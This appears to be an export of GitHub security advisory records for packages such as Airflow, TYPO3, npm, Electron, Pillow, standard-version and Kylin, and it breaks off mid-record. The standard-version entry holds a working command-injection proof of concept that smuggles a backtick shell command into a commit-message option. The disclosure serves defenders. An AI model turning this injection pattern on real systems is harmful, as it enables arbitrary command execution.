+1.4.0,GHSA-q4p3-qw5c-mhpc,2021-09-22T21:22:13Z,2020-07-27T16:57:25Z,,['CVE-2020-11983'],Multiple stored XSS in RBAC Admin screens in Apache Airflow,"An issue was found in Apache Airflow versions 1.10.10 and below. It was discovered that many of the admin management screens in the new/RBAC UI handled escaping incorrectly, allowing authenticated users with appropriate permissions to create stored XSS attacks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11983'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T16:55:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4h44-w6fm-548g,2021-11-19T15:44:20Z,2020-07-29T16:15:12Z,,['CVE-2020-15086'],Potential Remote Code Execution in TYPO3 with mediace extension,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (9.1)
+> * CWE-325, CWE-20, CWE-200, CWE-502
+
+### Problem
+It has been discovered that an internal verification mechanism can be used to generate arbitrary checksums. This allows to inject arbitrary data having a valid cryptographic message authentication code (HMAC-SHA1) and can lead to various attack chains as described below.
+
+* [TYPO3-CORE-SA-2020-007](https://typo3.org/security/advisory/typo3-core-sa-2020-007), [CVE-2020-15099](https://nvd.nist.gov/vuln/detail/CVE-2020-15099): Potential Privilege Escalation
+ + the database server used for a TYPO3 installation must be accessible for an attacker (either via internet or shared hosting network)
+ + `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (7.5, high)
+* [TYPO3-CORE-SA-2016-013](https://typo3.org/security/advisory/typo3-core-sa-2016-013), [CVE-2016-5091](https://nvd.nist.gov/vuln/detail/CVE-2016-5091): Insecure Deserialization & Remote Code Execution
+ + an attacker must have access to at least one Extbase plugin or module action in a TYPO3 installation
+ + `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (9.1, critical)
+
+The overall severity of this vulnerability is critical (9.1) based on mentioned attack chains and the fact it does not require any privileges.
+
+### Solution
+In case the extension is not used and required at all, it is suggested to uninstall and remove it from the system completely. Otherwise, an updated version 7.6.5 is available from the TYPO3 extension manager, Packagist and the TYPO3 extension repository:
+
+* https://extensions.typo3.org/extension/download/mediace/7.6.5/zip/
+* https://packagist.org/packages/friendsoftypo3/mediace#7.6.5
+
+As a precautionary measure it is advised to change `encryptionKey` and database credentials in `typo3conf/LocalConfiguration.php`.
+
+### Credits
+Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.
+
+### References
+* [TYPO3-EXT-SA-2020-014](https://typo3.org/security/advisory/typo3-ext-sa-2020-014)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'friendsoftypo3/mediace'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.6.2'}, {'fixed': '7.6.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/FriendsOfTYPO3/mediace/security/advisories/GHSA-4h44-w6fm-548g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15086'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfTYPO3/mediace/pull/31'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfTYPO3/mediace/commit/fa29ffd3e8b275782a8600d2406e1b1e5e16ae75'}, {'type': 'PACKAGE', 'url': 'https://github.com/FriendsOfTYPO3/mediace'}]","{'cwe_ids': ['CWE-20', 'CWE-200', 'CWE-325', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T16:09:56Z', 'nvd_published_at': '2020-07-29T17:15:00Z'}"
+1.4.0,GHSA-93f3-23rq-pjfp,2022-08-10T23:59:40Z,2020-07-07T18:56:16Z,,['CVE-2020-15095'],npm CLI exposing sensitive information through logs,Versions of the npm CLI prior to 6.14.6 are vulnerable to an information exposure vulnerability through log files. The CLI supports URLs like `://[[:]@][:][:][/]`. The password value is not redacted and is printed to stdout and also to any generated log files.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'npm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.14.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/cli/security/advisories/GHSA-93f3-23rq-pjfp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15095'}, {'type': 'WEB', 'url': 'https://github.com/npm/cli/commit/a9857b8f6869451ff058789c4631fadfde5bbcbc'}, {'type': 'WEB', 'url': 'https://github.com/npm/cli/blob/66aab417f836a901f8afb265251f761bb0422463/CHANGELOG.md#6146-2020-07-07'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4OOYAMJVLLCLXDTHW3V5UXNULZBBK4O6/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202101-07'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00011.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00015.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00023.html'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T18:30:59Z', 'nvd_published_at': '2020-07-07T19:15:00Z'}"
+1.4.0,GHSA-m93v-9qjc-3g79,2021-01-07T23:48:11Z,2020-07-07T00:01:07Z,,['CVE-2020-4076'],Context isolation bypass via leaked cross-context objects in Electron,"### Impact
+Apps using `contextIsolation` are affected.
+
+This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.
+
+### Workarounds
+There are no app-side workarounds, you must update your Electron version to be protected.
+
+### Fixed Versions
+* `9.0.0-beta.21`
+* `8.2.4`
+* `7.2.4`
+
+### Non-Impacted Versions
+* `9.0.0-beta.*`
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@electronjs.org](mailto:security@electronjs.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-m93v-9qjc-3g79'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-4076'}, {'type': 'WEB', 'url': 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}]","{'cwe_ids': ['CWE-501'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-06T23:55:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-43fq-w8qq-v88h,2023-02-28T15:12:44Z,2020-07-27T21:52:36Z,,['CVE-2020-11538'],Out-of-bounds read in Pillow,"In libImaging/SgiRleDecode.c in Pillow through 7.0.0, a number of out-of-bounds reads exist in the parsing of SGI image files, a different issue than CVE-2020-5311.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11538'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4504'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4538'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/2ef59fdbaeb756bc512ab3f2ad15ac45665b303d'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/blob/master/docs/releasenotes/7.1.0.rst#security'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEBCPE4F2VHTIT6EZA2YZQZLPVDEBJGD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOKHNWV2VS5GESY7IBD237E7C6T3I427/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/7.1.0.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PILLOW-574574'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-2/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T21:35:11Z', 'nvd_published_at': '2020-06-25T19:15:00Z'}"
+1.4.0,GHSA-w534-q4xf-h5v2,2021-01-07T23:47:26Z,2020-07-07T16:32:49Z,,['CVE-2020-15231'],XSS in Mapfish Print relating to JSONP support,"### Impact
+A user can use the JSONP support to do a Cross-site scripting.
+
+### Patches
+Use version >= 3.24
+
+### Workarounds
+No
+
+### References
+* https://github.com/mapfish/mapfish-print/pull/1397/commits/89155f2506b9cee822e15ce60ccae390a1419d5e
+* https://cwe.mitre.org/data/definitions/79.html
+
+### For more information
+If you have any questions or comments about this advisory Comment the pull request: https://github.com/mapfish/mapfish-print/pull/1397","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mapfish.print:print-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.mapfish.print:print-servlet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.mapfish.print:print-standalone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.24'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mapfish/mapfish-print/security/advisories/GHSA-w534-q4xf-h5v2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15231'}, {'type': 'WEB', 'url': 'https://github.com/mapfish/mapfish-print/pull/1397/commits/89155f2506b9cee822e15ce60ccae390a1419d5e'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T16:31:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-43jj-2rwc-2m3f,2021-09-22T21:03:46Z,2020-07-15T17:38:04Z,,['CVE-2019-14273'],Broken access control on files,"In SilverStripe assets 4.0, there is broken access control on files.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14273'}, {'type': 'WEB', 'url': 'https://forum.silverstripe.org/c/releases'}, {'type': 'PACKAGE', 'url': 'https://github.com/FriendsOfPHP/security-advisories'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-14273.yaml'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/blog/tag/release'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2019-14273'}]","{'cwe_ids': ['CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-15T17:33:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jphg-qwrw-7w9g,2023-01-25T22:49:03Z,2020-07-27T18:08:21Z,,['CVE-2020-10663'],Unsafe object creation in json RubyGem,"The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269/GHSA-x457-cw4h-hq5f, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'json'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10663'}, {'type': 'PACKAGE', 'url': 'https://github.com/flori/json'}, {'type': 'WEB', 'url': 'https://github.com/flori/json/blob/master/CHANGES.md#2019-12-11-230'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/json/CVE-2020-10663.yml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37c0e1807da7ff2bdd028bbe296465a6bbb99e2320dbe661d5d8b33b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b04f4e99a19613f88ae088aa18cd271231a3c79dfff8f5efa8cda61@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f17bfca1d6e7f4b33ae978725b2fd62a9f1b3111696eafa9add802d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d2e174230f6d26e16c007546e804c343f1f68956f526daaafa4aaae@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb023d54a46da1ac0d8969097f5fecc79636b07d3b80db7b818a5c55c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2b981912446a74e14fe6076c4b7c7d8502727ea0718e6a65a9b1be5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd9b9cc843f5cf5b532bdad9e87a817967efcf52b917e8c43b6df4cc7@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec8bb4d637b04575da41cfae49118e108e95d43bfac39b7b698ee4db@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree3abcd33c06ee95ab59faa1751198a1186d8941ddc2c2562c12966c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7QL6MJD2BO4IRJ5CJFNMCDYMQQFT24BJ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F4TNVTT66VPRMX5UZYSDGSVRXKKDDDU5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NK2PBXWMFRUD7U7Q7LHV4KYLYID77RI4/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210129-0003/'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT211931'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4721'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2020/03/19/json-dos-cve-2020-10663/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00004.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2020/Dec/32'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T18:07:46Z', 'nvd_published_at': '2020-04-28T21:15:00Z'}"
+1.4.0,GHSA-7xcx-6wjh-7xp2,2021-09-22T21:03:04Z,2020-07-13T21:34:59Z,,[],Command Injection in standard-version,"# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-111`
+
+The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [standard-version](https://github.com/conventional-changelog/standard-version).
+
+## Summary
+
+The `standardVersion` function has a command injection vulnerability. Clients of the `standard-version` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
+
+## Product
+Standard Version
+
+## Tested Version
+Commit [2f04ac8](https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9/)
+
+## Details
+
+### Issue 1: Command injection in `standardVersion`
+
+The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:
+
+```
+npm install standard-version
+git init
+echo ""foo"" > foo.txt # the git repo has to be non-empty
+git add foo.txt
+git commit -am ""initial commit""
+```
+
+Now create a file with the following contents:
+
+```
+var fs = require(""fs"");
+// setting up a bit of environment
+fs.writeFileSync(""package.json"", '{""name"": ""foo"", ""version"": ""1.0.0""}');
+
+const standardVersion = require('standard-version')
+
+standardVersion({
+ noVerify: true,
+ infile: 'foo.txt',
+ releaseCommitMessageFormat: ""bla `touch exploit`""
+})
+```
+
+and run it:
+
+```
+node test.js
+```
+
+Notice that a file named `exploit` has been created.
+
+This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples:
+[CVE-2020-7646](https://github.com/advisories/GHSA-m8xj-5v73-3hh8),
+[CVE-2020-7614](https://github.com/advisories/GHSA-426h-24vj-qwxf),
+[CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh),
+[CVE-2019-10778](https://github.com/advisories/GHSA-4gp3-p7ph-x2jr),
+[CVE-2019-10776](https://github.com/advisories/GHSA-84cm-v6jp-gjmr),
+[CVE-2018-16462](https://github.com/advisories/GHSA-9jm3-5835-537m),
+[CVE-2018-16461](https://github.com/advisories/GHSA-7g2w-6r25-2j7p),
+[CVE-2018-16460](https://github.com/advisories/GHSA-cfhg-9x44-78h2),
+[CVE-2018-13797](https://github.com/advisories/GHSA-pp57-mqmh-44h7),
+[CVE-2018-3786](https://github.com/advisories/GHSA-c9j3-wqph-5xx9),
+[CVE-2018-3772](https://github.com/advisories/GHSA-wjr4-2jgw-hmv8),
+[CVE-2018-3746](https://github.com/advisories/GHSA-3pxp-6963-46r9),
+[CVE-2017-16100](https://github.com/advisories/GHSA-jcw8-r9xm-32c6),
+[CVE-2017-16042](https://github.com/advisories/GHSA-qh2h-chj9-jffq).
+
+We have written a [CodeQL](https://codeql.com) query, which automatically detects this vulnerability. You can see the results of the query on the `standard-version` project [here](https://lgtm.com/query/237522640229151035/).
+
+#### Impact
+
+This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
+
+#### Remediation
+
+We recommend not using an API that can interpret a string as a shell command. For example, use [`child_process.execFile`](https://nodejs.org/api/child_process.html#child_process_child_process_execfile_file_args_options_callback) instead of [`child_process.exec`](https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback).
+
+## Credit
+
+This issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh).
+
+## Contact
+
+You can contact the GHSL team at `securitylab@github.com`, please include `GHSL-2020-111` in any communication regarding this issue.
+
+## Disclosure Policy
+
+This report is subject to our [coordinated disclosure policy](https://securitylab.github.com/disclosures#policy).",[],"[{'package': {'ecosystem': 'npm', 'name': 'standard-version'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/conventional-changelog/standard-version/security/advisories/GHSA-7xcx-6wjh-7xp2'}, {'type': 'PACKAGE', 'url': 'https://github.com/conventional-changelog/standard-version'}, {'type': 'WEB', 'url': 'https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-13T21:33:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8m73-w2r2-6xxj,2023-03-03T00:01:57Z,2020-07-29T17:29:51Z,,['CVE-2020-7685'],Insecure defaults in UmbracoForms,"This affects all versions of package UmbracoForms. When using the default configuration for upload forms, it is possible to upload arbitrary file types. The package offers a way for users to mitigate the issue. The users of this package can create a custom workflow and frontend validation that blocks certain file types, depending on their security needs and policies.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'UmbracoForms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '8.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7685'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-UMBRACOFORMS-595765'}]","{'cwe_ids': ['CWE-1188'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T17:28:16Z', 'nvd_published_at': '2020-07-28T17:15:00Z'}"
+1.4.0,GHSA-v7m9-9497-p9gr,2021-11-19T15:44:01Z,2020-07-22T23:07:16Z,,['CVE-2020-15110'],Possible pod name collisions in jupyterhub-kubespawner,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+JupyterHub deployments using:
+
+- KubeSpawner <= 0.11.1 (e.g. zero-to-jupyterhub 0.9.0) and
+- enabled named_servers (not default), and
+- an Authenticator that allows:
+ - usernames with hyphens or other characters that require escape (e.g. `user-hyphen` or `user@email`), and
+ - usernames which may match other usernames up to but not including the escaped character (e.g. `user` in the above cases)
+
+In this circumstance, certain usernames will be able to craft particular server names which will grant them access to the default server of other users who have matching usernames.
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+
+Patch will be released in kubespawner 0.12 and zero-to-jupyterhub 0.9.1
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+#### KubeSpawner
+
+Specify configuration:
+
+for KubeSpawner
+```python
+from traitlets import default
+from kubespawner import KubeSpawner
+
+class PatchedKubeSpawner(KubeSpawner):
+ @default(""pod_name_template"")
+ def _default_pod_name_template(self):
+ if self.name:
+ return ""jupyter-{username}-{servername}""
+ else:
+ return ""jupyter-{username}""
+
+ @default(""pvc_name_template"")
+ def _default_pvc_name_template(self):
+ if self.name:
+ return ""claim-{username}-{servername}""
+ else:
+ return ""claim-{username}""
+
+c.JupyterHub.spawner_class = PatchedKubeSpawner
+```
+
+**Note for KubeSpawner:** this configuration will behave differently before and after the upgrade, so will need to be removed when upgrading. Only apply this configuration while still using KubeSpawner ≤ 0.11.1 and remove it after upgrade to ensure consistent pod and pvc naming.
+
+Changing the name template means pvcs for named servers will have different names. This will result in orphaned PVCs for named servers across Hub upgrade! This may appear as data loss for users, depending on configuration, but the orphaned PVCs will still be around and data can be migrated manually (or new PVCs created manually to reference existing PVs) before deleting the old PVCs and/or PVs.
+
+### References
+_Are there any links users can visit to find out more?_
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Open an issue in [kubespawner](https://github.com/jupyterhub/kubespawner)
+* Email us at [security@ipython.org](mailto:security@ipython.org)
+
+Credit: Jining Huang","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyterhub-kubespawner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.11.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/kubespawner/security/advisories/GHSA-v7m9-9497-p9gr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15110'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/kubespawner/commit/3dfe870a7f5e98e2e398b01996ca6b8eff4bb1d0'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/kubespawner'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-17T20:49:37Z', 'nvd_published_at': '2020-07-17T21:15:00Z'}"
+1.4.0,GHSA-7hmh-8gwv-mfvq,2021-09-22T21:57:07Z,2020-07-27T22:51:47Z,,['CVE-2020-1937'],SQL Injection in Kylin,"Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-server-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-server-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.1'}]}], 'versions': ['3.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1937'}, {'type': 'WEB', 'url': 'https://github.com/apache/kylin/commit/e373c64c96a54a7abfe4bccb82e8feb60db04749'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/kylin'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61666760d8a4e8764b2d5fe158d8a48b569414480fbfadede574cdc0@%3Ccommits.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc574fef23740522f62ab3bbda4f6171be98aa7a25f3f54be143a80a8%40%3Cuser.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKYLIN-552148'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T22:50:42Z', 'nvd_published_at': '2020-02-24T21:15:00Z'}"
+1.4.0,GHSA-3pc2-fm7p-q2vg,2021-03-04T18:26:09Z,2020-07-02T16:55:11Z,,['CVE-2020-4061'],Cross-site Scripting in October,"### Impact
+Pasting content copied from malicious websites into the Froala richeditor could result in a successful self-XSS attack.
+
+### Patches
+Issue has been patched in Build 467 (v1.0.467).
+
+### Workarounds
+Apply https://github.com/octobercms/october/commit/b384954a29b89117e1c0d6035b3ede4f46df67c5 to your installation manually if unable to upgrade to Build 467.
+
+### References
+- https://research.securitum.com/the-curious-case-of-copy-paste/
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat Assessment
+Assessed as Low given that by the nature of the attack it can only impact users that do it to themselves by copying and pasting from malicious websites.
+
+### Acknowledgements
+
